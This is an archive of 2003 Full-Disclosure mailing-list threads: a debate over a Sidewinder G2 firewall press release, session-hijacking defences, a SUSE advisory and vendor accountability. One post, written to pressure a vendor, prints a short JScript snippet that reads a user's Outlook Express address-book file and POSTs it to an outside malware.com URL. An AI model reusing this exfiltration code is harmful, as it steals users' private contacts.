RE: [Full-Disclosure] Sidewinder G2
Comments please Secure Computing Sidewinder G2 Firewall Stops New High-Profile Sendmail Attack Secure's Sidewinder G2 Firewall with Patented Type Enforcement Technology Prevents Sendmail Attack Warned About in CERT Advisory CA-2003-07 - No Emergency Security Patches Required SAN JOSE, Calif., March 10, 2003 - Secure Computing Corporation (Nasdaq: SCUR), the experts in protecting the most important networks in the world, today announced that the SidewinderR G2 FirewallT and VPN gateway continues to prove itself to be the world's strongest firewall in the face of another high profile attack directed at a basic component of the Internet's infrastructure. The software vulnerability, along with the related attack, worst case outcome, and recommend response was reported by the Computer Emergency Response Team (CERT) at Carnegie Mellon University in CERT advisory CA-2003-07. The attack targets vulnerabilities in e-mail transfer servers, called Sendmail servers. Sendmail is the cornerstone application on the Internet used for moving billions of e-mail messages daily. More than half of the large ISPs and Fortune 500 companies use Sendmail, as well as Governments around the world. The Sidewinder G2 Firewall, protected by Secure Computing's patented Type EnforcementR technology, is fully capable of defending itself against this attack without incident and will continue passing only legitimate mail messages on to internal mail servers. Furthermore, if a mail message containing this attack is processed on the Sidewinder G2 Firewall for mail-forwarding services, the malicious 'attack code' embedded in the message is automatically manipulated, rendering the attack benign before the Sidewinder G2 Firewall delivers it to any internal Sendmail servers. Weaker stateful inspection firewalls that often claim speed as their number one value proposition will pass the malicious code in question directly through to internal mail servers. Secure Computing's Sidewinder G2 Firewall offers a defense against Sendmail attacks because it contains an embedded SecureOST operating system, application proxy architecture, and its own secure Sendmail server, said Charles Kolodgy, research director, Security Products at IDC. Even more significant is Sidewinder's potential to defend against possible Sendmail attacks without any patches. This high profile attack is very dangerous as it can be used to take complete root control of Sendmail servers, thus giving the attacker a strong foothold on internal networks from anywhere across the Internet. Since the attack is message-oriented (application layer) as opposed to connection-oriented (packet layer), only Layer 7 application firewalls like the Sidewinder G2 Firewall can stop the attack at the perimeter. In addition, Sidewinder's natively embedded intrusion detection, real-time forensics, and automated alerting system called StrikebackR would trigger multiple security alarms in the case of this remote buffer overflow Sendmail attack. Most organizations that run traditional stateful inspection firewalls, and companies that manufacture them, are looking at very serious security risks and reactive, preventive, steps to remove those risks, said Mike Gallagher, vice president and general manager of the network security division at Secure Computing. Sidewinder G2 customers, however, have no panic situation occurring because they know that Sidewinder's hybrid architecture renders this attack useless against both the hosted Sendmail services on Sidewinder G2 and any targeted Sendmail services behind the firewall. A typical countermeasure to this class of attack for organizations that don't have hybrid, high-security firewalls like the Sidewinder G2 Firewall, is to apply and test emergency security patches on all vulnerable Sendmail servers. This react-and-patch cycle is very costly and disruptive. Secure's firewall customers have been sent a reassuring letter notifying them about the details of this vulnerability and reiterating that there is no need for emergency security patches. Secure refers to its patented high-security firewall design as multi-layered defense-in-depth security because it protects against both known and unknown vulnerabilities. About Secure Computing Secure Computing (Nasdaq: SCUR) has been protecting the most important networks in the world for over 20 years. With broad expertise in security technology, we develop network security products that help our customers create a trusted environment both inside and outside of their organizations. Our global customers and partners include the majority of the Dow Jones Global 50 Titans and the most prominent organizations in banking, financial services, healthcare, telecommunications, manufacturing, public utilities, and federal and local governments. The company is headquartered in San Jose, Calif., and has sales offices worldwide. For more information, see http://www.securecomputing.com. -Original Message-
[Full-Disclosure] My take on the Newly discovered Exchange Flaw
Hi If someone posted this on the list, I missed it. Mail server flaw opens Exchange to spam http://news.com.com/2100-7355_3-5107904.html?tag=nefd_top Following the article through gets you some company Think Computer who claim they have found a flaw. They even wrote a 7 page white paper on the Flaw! http://www.thinkcomputer.com/corporate/news/spamserver.pdf I don't know that much about default accounts on Windows NT and Exchange 5.5, but I do know a bit about Windows 2000 AD, and Exchange 2000. What the author claims is if the guest account on the Server is active then the account can be used to send email. Now I am not disputing the logic there. If a guest account is active and it has been given an Exchange mailbox (GOK) then the account can be used to send email. Before continuing here is some important information to consider: 1. When a Server is built as a Domain Controller, the Local Accounts are deleted and only AD (Active Directory) Accounts can access the server. The Guest account is automatically disabled. 2. When a Server is built as a Domain Member, the Local Accounts remain. Those accounts and AD (Active Directory) Accounts can access the server. When a server is joins the Domain The Local Guest Account is disabled by default. 3. When Exchange 2000 is installed it does not create mailboxes by default. The mailboxes have to be created. Thus for this flaw to work on a Server with Exchange 2000, An Administrator would have had to have activated the Guest account. I have never seen such a stupid claim as needing the Guest Account active to send mail from. Lan Guy ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] defense against session hijacking
I'm not going to claim that my method is fool-proof, but.. If you are using sessions on your site then you should have the ability to track the movement of a user through-out your system. If you record the last page the user was on (with a specific session-id) and then check the referrer server variable on their next hit. Compare the referrer to their last known page. Most of the time (depending on the complexity of your site) the referrer and last known page should match. If their session is 'hijacked', odds are the 'hijacker' will not be following in a valid user's footsteps, more likely they will just be coming at the server with rogue data. The referrer check won't match and thus the validity of the session request is also void. The catch is, how much programming are you willing to do to ensure the integrity of your system. If you are looking for the easy-route (using PHP's embedded session module) then there is no direct way to secure the sessions. If you are willing to build you own session module for your given CGI language then the sky is the limit (as long as you are willing to get your hands dirty at the start). Jason Ziemba -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi All, Sorry if this is common knowledge or regularly discussed; I'm fairly new to the list. I see quite a few messages on this and other security lists about session hijacking in Web applications. Isn't it good defense for a programmer to store the IP address of the client when the session is initiated, and then compare that address against the client for each subsequent request, destroying the session if the address changes? Do many programmers really overlook this simple method to protect against such an attack? It's not perfect but should significantly increase the difficulty of such an attack with little or no annoying side effects for the legitimate user. Would it be useful to extend the session modules of the common Web scripting languages (e.g. PHP) to enable an IP address check by default? Best Regards, - -- :: t h o m a s d u f f e y :: h o m e b o y z i n t e r a c t i v e -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.2 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQE/uTrH8fKWAp8CzDARAhyOAJ9kXkkiUERgEVRWhH5GtGACTKA1hwCfak+7 KsyUSQG+iAcPVxX3BIdTTRc= =9f2R -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] defense against session hijacking
Hi, Am Mon, 2003-11-17 um 22.16 schrieb Thomas M. Duffey: method to protect against such an attack? It's not perfect but should significantly increase the difficulty of such an attack with little or no annoying side effects for the legitimate user. Would it be useful to extend the session modules of the common Web scripting languages (e.g. PHP) to enable an IP address check by default? why you don't force session handling with cookies and set session lifetime to 20mins (or so)? Bart ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Sidewinder G2
On Mon, 17 Nov 2003 15:44:01 MST, Michael Gale [EMAIL PROTECTED] said: I believe two of the most secure firewalls are Cisco Pix and the BorderWare Firewall. Cisco does not offer any services and Borderware offers a few for small business and are very restrictive. For a machine that doesn't have any services, the Cisco PIX is infamous for breaking SMTP. Google for 'cisco pix smtp' and let me know if you still think the PIX doesn't have services on it. pgp0.pgp Description: PGP signature
Re: [Full-Disclosure] defense against session hijacking
If you record the last page the user was on (with a specific session-id) and then check the referrer server variable on their next hit. Compare the referrer to their last known page. Most of the time (depending on the complexity of your site) the referrer and last known page should match. If their session is 'hijacked', odds are the 'hijacker' will not be following in a valid user's footsteps, more likely they will just be coming at the server with rogue data. The referrer check won't match and thus the validity of the session request is also void. 1. The referrer header is an optional header in HTTP. Most current browsers send it, but some allow you to turn it off entirely for privacy reasons. 2. The referrer header is trivial to spoof, since it comes from the client, and HTTP is more or less a stateless protocol between requests. Conclusion: Your suggestion is in no way more secure, and it requires users to turn on the referrer header, which they may not feel comfortable doing, generally. As for a constructive suggestion: Fix your cross site scripting holes. Doing so is the best way to avoid session hijacking. Design your apps from the ground up to be secure. Quote anything remotely resembling HTML that comes from an untrusted source and is displayed on your dynamic pages. cheers, tim ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Sidewinder G2
The cisco PIX doesn't run the actual SMTP service. The problem would be in the Fixup for the SMTP protocol. This also could cause problems with DNS in 6.3... HOWEVER, FW-1 developed this under the SmartDefense technology and I'll tell you it WILL break a lot of things. Websense breaks with SmartDefense as well as anything that doesn't use an RFC compliant protocol. Websense had a bad issue with invalid header lengths.. But I think NG FP4 should correct a lot of this. JP -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Tuesday, November 18, 2003 8:54 AM To: Michael Gale Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Sidewinder G2 On Mon, 17 Nov 2003 15:44:01 MST, Michael Gale [EMAIL PROTECTED] said: I believe two of the most secure firewalls are Cisco Pix and the BorderWare Firewall. Cisco does not offer any services and Borderware offers a few for small business and are very restrictive. For a machine that doesn't have any services, the Cisco PIX is infamous for breaking SMTP. Google for 'cisco pix smtp' and let me know if you still think the PIX doesn't have services on it. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Sidewinder G2
Paul Niranjan wrote: Comments please The problem is that this is a typical press release with no real content. ... The Sidewinder G2 Firewall, protected by Secure Computing's patented Type EnforcementR technology, is fully capable of defending itself against this attack without incident and will continue passing only legitimate mail messages on to internal mail servers. Furthermore, if a mail message containing this attack is processed on the Sidewinder G2 Firewall for mail-forwarding services, the malicious 'attack code' embedded in the message is automatically manipulated, rendering the attack benign before the Sidewinder G2 Firewall delivers it to any internal Sendmail servers. Weaker stateful inspection firewalls that often claim speed as their number one value proposition will pass the malicious code in question directly through to internal mail servers. There is a lot of assertion in the above paragraph, but nothing as to how. It seems to imply that the Sidewinder sendmail is acting as a proxy, not a real mail server. This makes sense as an application layer proxy for mail is easier (and cheaper) to implement than writing an all new proxy. I'm now into the realm of speculation, but I think that the G2 has a minimal sendmail configured to act as a forwarding MTA to the protected enclave's real mail server. I doubt if the G2 also runs a POP3 or IMAP server for direct client access. Secure Computing's Sidewinder G2 Firewall offers a defense against Sendmail attacks because it contains an embedded SecureOST operating system, application proxy architecture, and its own secure Sendmail server, said Charles Kolodgy, research director, Security Products at IDC. Even more significant is Sidewinder's potential to defend against possible Sendmail attacks without any patches. This implies that they have modified sendmail on their platform. Or perhaps Mr. Kolodgy is fudging a little and claiming a custom sendmail on the basis of custom configuration and MAC policy. This high profile attack is very dangerous as it can be used to take complete root control of Sendmail servers, thus giving the attacker a strong foothold on internal networks from anywhere across the Internet. Since the attack is message-oriented (application layer) as opposed to connection-oriented (packet layer), only Layer 7 application firewalls like the Sidewinder G2 Firewall can stop the attack at the perimeter. They seem to be claiming that their sendmail will repackage the message rather than just add a Received: line in the mail header. I don't do sendmail enough to know whether this is possible. The more I think on this, the more I'm convinced that they don't do address checking in their sendmail (which is a Bad Thing if they really are selling their firewall as a mail server). ... In addition, Sidewinder's natively embedded intrusion detection, real-time forensics, and automated alerting system called StrikebackR would trigger multiple security alarms in the case of this remote buffer overflow Sendmail attack. I love systems like these. Instead of modififying the logs, one simply floods them to the point that admins don't read them. Most organizations that run traditional stateful inspection firewalls, and companies that manufacture them, are looking at very serious security risks and reactive, preventive, steps to remove those risks, said Mike Gallagher, vice president and general manager of the network security division at Secure Computing. Sidewinder G2 customers, however, have no panic situation occurring because they know that Sidewinder's hybrid architecture renders this attack useless against both the hosted Sendmail services on Sidewinder G2 and any targeted Sendmail services behind the firewall. More than ever, I'm convinced that Sidewinder dodged this bullet more by luck than skill. I think that the Sidewinder firewall has a sendmail configured to act as a proxy that doesn't do address checking. Since it doesn't do address checking, it wasn't vulnerable to the attack. The repackaging of the mail messages in proxy mode probably meant that the Sidewinder sendmail uses some sort of alternate address translation (a lookup table?) that completely changed the attack addresses (or dropped them as not having a corresponding internal address). Goetz ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Sidewinder G2
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul Niranjan Sent: Tuesday, November 18, 2003 1:29 AM To: 'Michael Gale'; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Sidewinder G2 Comments please Secure Computing Sidewinder G2 Firewall Stops New High-Profile Sendmail Attack Secure's Sidewinder G2 Firewall with Patented Type Enforcement Technology Prevents Sendmail Attack Warned About in CERT Advisory CA-2003-07 - No Emergency Security Patches Required 1) You have to patch servers irregardless of whether they are protected by other mechanisms or not. You're still vulnerable to an internal attack on sendmail, which Sidewinder would do nothing about. pet peeveSecurity doesn't start and end at the edge. Blaster/Nachi should have skewered that canard forever. So why do vendors still advertise as if it does?/pet peeve 2) There are other methods of protecting yourself, such as using mail servers that aren't made of swiss cheese like sendmail is. 3) What happens when Sidewinder fails? Does it fail open? If it does (and it should), is their version of sendmail still protected? Or is it sitting on the Internet bare-ass naked, waiting to be 0wn3d? 4) I'm a big believer in not clumping all your services in one place. Single points of failure shouldn't result in complete disaster to an organization. At least not those parts that you can control. 5) If a vulnerability to sendmail was discovered that Sidewinder couldn't protect against, you're at the complete mercy of Sidewinder to provide a fix. In the meantime, you're screwed. 6) I don't think highly of security companies that use known insecure solutions. They could have chosen Postfix or Qmail. Yet they chose sendmail and hardened it. Makes me wonder about their powers of judgment. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] SUSE Security Announcement: sane (SuSE-SA:2003:046)
-BEGIN PGP SIGNED MESSAGE- __ SUSE Security Announcement Package:sane Announcement-ID:SuSE-SA:2003:046 Date: Tuesday, Nov 18th 2003 14:30 MEST Affected products: 7.3, 8.0, 8.1 SuSE Linux Desktop 1.0 Vulnerability Type: remote denial-of-service Severity (1-10):5 SUSE default package: yes Cross References: CAN-2003-0773 CAN-2003-0774 CAN-2003-0775 CAN-2003-0776 CAN-2003-0777 CAN-2003-0778 Content of this advisory: 1) security vulnerability resolved: several security vulnerabilities problem description, discussion, solution and upgrade information 2) pending vulnerabilities, solutions, workarounds: - ethereal - KDE - KDE wrong file permissions - ircd - mc - apache1/2 - proftpd - gdm2 - epic/epic4 3) standard appendix (further information) __ 1) problem description, brief discussion, solution, upgrade information The sane (Scanner Access Now Easy) package provides access to scanners either locally or remotely over the network. Several bugs in sane were fixed to avoid remote denial-of-service attacks. These attacks can even be executed if the remote attacker is not allowed to access the sane server by not listing the attackers IP in the file sane.conf. Per default saned only accepts local requests. As a temporary workaround saned can be started via xinetd or inetd in conjunction with tcpwrapper to restrict remote access. Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command rpm -Fhv file.rpm to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. Intel i386 Platform: SuSE-8.1: ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sane-1.0.8-143.i586.rpm 5b728bc3ac724be64aa736dbebe2aa23 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sane-1.0.8-143.i586.patch.rpm 77ab2574c35513136076c4b2a77e9cbf source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/sane-1.0.8-143.src.rpm 6ddec5bdadb07f985a08e592cd4c68b3 SuSE-8.0: ftp://ftp.suse.com/pub/suse/i386/update/8.0/gra2/sane-1.0.7-217.i386.rpm 9438d81c7bd8b41dee948696f138c771 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.0/gra2/sane-1.0.7-217.i386.patch.rpm f461a294ab7d3638bf4b3e83f3910143 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/sane-1.0.7-217.src.rpm ea888fa0c4e6aaf41e23caaf4f68a1d2 SuSE-7.3: ftp://ftp.suse.com/pub/suse/i386/update/7.3/gra1/sane-1.0.5-295.i386.rpm 53d25817ed9c53cf6078d3794862a13e source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/sane-1.0.5-295.src.rpm 593a886a54482c841baa0fe9d43690c6 Sparc Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/sparc/update/7.3/gra1/sane-1.0.5-114.sparc.rpm bdb7ce58c8d363a03dadc719c2421d84 source rpm(s): ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/sane-1.0.5-114.src.rpm 4d0f4994f1fc730edfcefa2d33fe456d PPC Power PC Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/ppc/update/7.3/gra1/sane-1.0.5-179.ppc.rpm 83643306b81f0e89d4a5c96001a65ea5 source rpm(s): ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/sane-1.0.5-179.src.rpm fa277cfb3ec68aedb24de2ff2d13673f __ 2) Pending vulnerabilities in SUSE Distributions and Workarounds: - ethereal A new official version of ethereal, a network traffic analyzer, was released to fix various security-related problems. An update package is currently being tested and will be released as soon as possible. - KDE New KDE packages are currently being tested. These packages fixes several vulnerabilities: + remote root compromise (CAN-2003-0690) + weak cookies (CAN-2003-0692) + SSL man-in-the-middle attack + information leak through HTML-referrer (CAN-2003-0459) The packages will be release as soon as testing is finished. - KDE wrong file permissions Due to a missing synchronisation during SuSE Linux 8.2 beta-testing phase some configuration files of KDE on SuSE
RE: [Full-Disclosure] Sidewinder G2
I think Michael was talking about having a sendmail service running on a firewall, and not a mail guard feature which the Cisco Pix has, which is supposed to limit SMTP commands to a specified minimum set of commands. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of [EMAIL PROTECTED] Sent: 18 November 2003 14:54 To: Michael Gale Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Sidewinder G2 On Mon, 17 Nov 2003 15:44:01 MST, Michael Gale [EMAIL PROTECTED] said: I believe two of the most secure firewalls are Cisco Pix and the BorderWare Firewall. Cisco does not offer any services and Borderware offers a few for small business and are very restrictive. For a machine that doesn't have any services, the Cisco PIX is infamous for breaking SMTP. Google for 'cisco pix smtp' and let me know if you still think the PIX doesn't have services on it. BBCi at http://www.bbc.co.uk/ This e-mail (and any attachments) is confidential and may contain personal views which are not the views of the BBC unless specifically stated. If you have received it in error, please delete it from your system. Do not use, copy or disclose the information in any way nor act in reliance on it and notify the sender immediately. Please note that the BBC monitors e-mails sent or received. Further communication will signify your consent to this. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Sidewinder G2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 My $.02 worth with a disclaimer: I previously worked for Secure Computing. I have no vested interest in them now; I don't even own stock in SCC any more. With that said... Part of Secure Computing's problem over the years is their inability to make the Type Enforcement(TE) and Mandatory Access Control technology understandable to the masses. The Sidewinder technology, and its use of TE to sandbox those few services it does run, makes the device (so far at least) impossible to break through. There isn't a root to own in a running box. Even if you could successfully do something to sendmail, the very WORST that could happen is your mail would be broken. Nothing else is or could be in any way compromised. An earlier post (see Paul Niranjan's) in this thread pointed out quite well why there should be no fear. While the article that was posted had a lot of marketing overtones (to put it nicely,) what was said is correct. The version of sendmail is small and so tightly locked down that it is unlikely to be exploitable in any fashion. No root or elevation in privilege is possible. No way to break through to other services including the core firewall operations or rule sets. Sidewinder is trusted in some of the most intensely secure places within the government and industry, and I don't know of any successful hacks against it. Repeated hacker challenges by Secure Computing against the Sidewinder have proven it hasn't been compromised. If someone can prove they've broken through one OTHER than through the stupidity of someone configuring a rule wrong, I'd sure love to hear about it. I believe in Sidewinder to the max after having worked with them for awhile. Before you dismiss the Sidewinder, you really should spend some time up on their web site, and in particular read a couple of their white papers on Type Enforcement. That may help you understand the technology behind it a little better. The Sidewinder isn't cheap and it isn't the fastest, but it is one of the most secure around. If a gazillion packets a second gets you hot and bothered, go with someone else. If high security does it for you, Sidewinder is a better choice. Ok...so maybe that was $.03 worth! Sorry. Steve Kruse J. Stephen Kruse, CISSP Chief Information Security Officer City of Lakeland, Florida http://www.lakelandgov.net mailto:[EMAIL PROTECTED] PGP Fingerprint: 20FF 54A6 AFA0 5492 8830 9687 3314 D77D DFC7 D848 -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Tuesday, November 18, 2003 9:54 AM To: Michael Gale Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Sidewinder G2 On Mon, 17 Nov 2003 15:44:01 MST, Michael Gale [EMAIL PROTECTED] said: I believe two of the most secure firewalls are Cisco Pix and the BorderWare Firewall. Cisco does not offer any services and Borderware offers a few for small business and are very restrictive. For a machine that doesn't have any services, the Cisco PIX is infamous for breaking SMTP. Google for 'cisco pix smtp' and let me know if you still think the PIX doesn't have services on it. -BEGIN PGP SIGNATURE- Version: PGP 8.0.2 iQA/AwUBP7pFXTMU133fx9hIEQJsZwCg7j7mLmvhBiE875iiKDuVoE7JEbMAn2XQ 1Xqqebh00XrTiBnNBs4hjh8c =GUfB -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Sidewinder G2
On Tue, 18 Nov 2003 09:49:52 CST, Perrymon, Josh L. said: The cisco PIX doesn't run the actual SMTP service. The problem would be in the Fixup for the SMTP protocol. Hmm.. so we *don't* actually do SMTP, we merely screw with the bits in passing even more than an actual SMTP relay would do (as it would just slap on a Received: and keep going). It answers a SYN packet on port 25, it sends a distinctive '220 hello' reply different than what might be behind it, it accepts EHLO/MAIL FROM/RCPT TO/DATA/QUIT, it isn't merely tunneling packets to a server behind the firewall. Pedantic sophistry at its best. It's an SMTP server, guys. Looks like a duck, quacks like a duck, and slapping a this is a Fixup not a Server label on it isn't gonna remove the duck feathers. pgp0.pgp Description: PGP signature
Re: [Full-Disclosure] Sidewinder G2
On Tue, 18 Nov 2003 10:52:29 CST, Perrymon, Josh L. said: So it's a packet filter with application inspection... right..?? It gave up any right to claim that when it gave its own 220 banner rather than the banner of the actual destination it was filtering for. pgp0.pgp Description: PGP signature
RE: [Full-Disclosure] Sidewinder G2
On Tue, 18 Nov 2003, Kruse, Steve [EMAIL PROTECTED] wrote: Repeated hacker challenges by Secure Computing against the Sidewinder have proven it hasn't been compromised. Proven is much too strong a word. See: http://www.schneier.com/crypto-gram-9812.html#contests -- Brent J. Nordquist [EMAIL PROTECTED] N0BJN Other contact information: http://kepler.acns.bethel.edu/~bjn/contact.html * Fast pipe * Always on * Get out of the way - Tim Bray http://tinyurl.com/7sti ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Sidewinder G2
So the pix allows the 7 command in RFC 821 section 4.5.1-- DATA HELO MAIL NOOP QUIT RCPT RSET If a remote client sends ESMTP it converts it to a NOOP command and sends it to the firewall... And it also analyses the data payload and if it finds an invalid request it will remove the command or send a NOOP to the server. The PIX will respond with 's in the SMTP version if you do a telnet... So it's a packet filter with application inspection... right..?? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Tuesday, November 18, 2003 10:20 AM To: Perrymon, Josh L. Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Sidewinder G2 On Tue, 18 Nov 2003 09:49:52 CST, Perrymon, Josh L. said: The cisco PIX doesn't run the actual SMTP service. The problem would be in the Fixup for the SMTP protocol. Hmm.. so we *don't* actually do SMTP, we merely screw with the bits in passing even more than an actual SMTP relay would do (as it would just slap on a Received: and keep going). It answers a SYN packet on port 25, it sends a distinctive '220 hello' reply different than what might be behind it, it accepts EHLO/MAIL FROM/RCPT TO/DATA/QUIT, it isn't merely tunneling packets to a server behind the firewall. Pedantic sophistry at its best. It's an SMTP server, guys. Looks like a duck, quacks like a duck, and slapping a this is a Fixup not a Server label on it isn't gonna remove the duck feathers. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Sidewinder G2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Brent: Yes, I've read Bruce's feelings about hacker contest's before, and in principle, I agree it doesn't prove a sustained attack by a determined enemy with enough computing power and dollars (Rubles, Yen, Euros whatever) can be thwarted. If someone like a government entity was hacking away at a firewall, they sure aren't going to claim the prize; rather they now have the knowledge of how it was done, use it, and keep quiet about it. I have the utmost respect for what Bruce says. I'll agree proven is too strong a word. But it would give me more confidence that your average 133t h4x0r isn't going to run willy nilly through the firewall. They may find a way AROUND it, or socially engineer their way in, sure. Just not THROUGH it. Score one for Brent. Proven IS too strong. Steve Kruse J. Stephen Kruse, CISSP Chief Information Security Officer City of Lakeland, Florida http://www.lakelandgov.net mailto:[EMAIL PROTECTED] PGP Fingerprint: 20FF 54A6 AFA0 5492 8830 9687 3314 D77D DFC7 D848 -Original Message- From: Brent J. Nordquist [mailto:[EMAIL PROTECTED] Sent: Tuesday, November 18, 2003 12:03 PM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Sidewinder G2 On Tue, 18 Nov 2003, Kruse, Steve [EMAIL PROTECTED] wrote: Repeated hacker challenges by Secure Computing against the Sidewinder have proven it hasn't been compromised. Proven is much too strong a word. See: http://www.schneier.com/crypto-gram-9812.html#contests - -- Brent J. Nordquist [EMAIL PROTECTED] N0BJN Other contact information: http://kepler.acns.bethel.edu/~bjn/contact.html * Fast pipe * Always on * Get out of the way - Tim Bray http://tinyurl.com/7sti ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -BEGIN PGP SIGNATURE- Version: PGP 8.0.2 iQA/AwUBP7pgEjMU133fx9hIEQKiSACguBmBadHYSjlV+ZYBmHi028viPLoAn1pd q7Pr2om9md5nHVEU3aVFmws+ =Murr -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Sidewinder G2
On Tue, Nov 18, 2003 at 11:03:06AM -0600, Brent J. Nordquist wrote: On Tue, 18 Nov 2003, Kruse, Steve [EMAIL PROTECTED] wrote: Repeated hacker challenges by Secure Computing against the Sidewinder have proven it hasn't been compromised. Proven is much too strong a word. See: http://www.schneier.com/crypto-gram-9812.html#contests I think that may be a bad example as that talks about crypto challenges as oppsoed to operational security products. There is a big diffrence in cryptanalysis and bug hunting in firewalls. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Sidewinder G2
On Tue, 18 Nov 2003, David Maynor [EMAIL PROTECTED] wrote: On Tue, Nov 18, 2003 at 11:03:06AM -0600, Brent J. Nordquist wrote: http://www.schneier.com/crypto-gram-9812.html#contests I think that may be a bad example as that talks about crypto challenges as oppsoed to operational security products. There is a big diffrence in cryptanalysis and bug hunting in firewalls. I disagree. Click the above and notice that Bruce even uses the word firewall in the second line... he isn't restricting his comments to just cryptosystems in that article, but rather he talks about whole systems and products. -- Brent J. Nordquist [EMAIL PROTECTED] N0BJN Other contact information: http://kepler.acns.bethel.edu/~bjn/contact.html * Fast pipe * Always on * Get out of the way - Tim Bray http://tinyurl.com/7sti ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Security researchers organization
!-- What I would like to see created is an organization that would promote and protect the interests of security researchers, plain and simple. There is currently no organization that exists solely to guide, help and represent security researchers on a larger scale, yet we can all recognize the need. -- I don't think those capable of actually doing research require hand holding by anyone. !-- We are a wide, international and differing group of researchers, some with malicious and others with altruistic intents for finding security vulnerabilities. Despite our differences we have much in common - we are deeply interested in advancing our knowledge of security and information technology, we find vulnerabilities, we want the vendor to know about these at some point in time and we want to be accredited for our findings. -- Can this not already be achieved by following the minimum requirement of any one particular vendor. Or following any one of the number of so-called disclosure guidelines already tabled. While some may want accreditation and pat on the back, others may want the continual flow of effluent onto the internet to cease. Some want habitual offenders penalised. Monetarily. Some want an authoritative body like a UL or CSA or VDE or SEMKO or BS to stamp their mark on product entering the internet. 'REJECTED' for junk product that finds it's way repeatedly onto the internet. Allow me to give you an example of a habitual offender: There is a peculiar file that appears on almost everyone's computers since April of 2003. Peculiar enough in that all it is, is a tilde ~. Inside that file is the entire contents of the user's address book. In fact, the file is exactly that. The user's address book. Simply adding the extension of *.wab to it, opens up none other than the Windows Address Book. All names, addresses and whatever critically private information one puts in there. Some people even put their banking and credit card details in there believe it or not. This peculiar little file is an oddity created by the April 2003, Cumulative Patch for Outlook Express (330994). Now seven months ago. A most useful file in that it is created in a number of well known places including C:. Knowing the file name and location makes it quite easy to 'steal' this file and invade the privacy of the user of the computer where it still resides today. Some seven months after the vendor knowing full well about it. [I believe there is a pending lawsuit against the same vendor along the same lines at this time]. You see: var x = new ActiveXObject(Microsoft.XMLHTTP); x.Open(GET, file:///C:/~,0); x.Send(); var y = new ActiveXObject (Microsoft.XMLHTTP); y.Open(POST, http://www.malware.com/forthetaking.php;, false); y.Send(x.responseBody); Will get and post that file. With a little bit of effort and timing, all one needs to do is steal that file and invade the privacy of the customer ! And who's fault will that be? Mine for providing this glaringly obvious scenario 'for free' or the vendor sitting on their hands for seven months thinking about it for a fee. REJECT ! the product and keep it off the internet ! -- http://www.malware.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: yet another OpenBSD kernel hole ...
On Mon, Nov 17, 2003 at 20:23:12 -0500 (EST), [EMAIL PROTECTED] wrote:
noir attached exploit will get you uid=0 and break any possible chroot jail
noir your parent process might be in, works on all 2.x and 3.x upto 3.3.
noir
noir priv seperation, chroot jail, systrace yeah yeah right ;P theo and niels
Your code does:
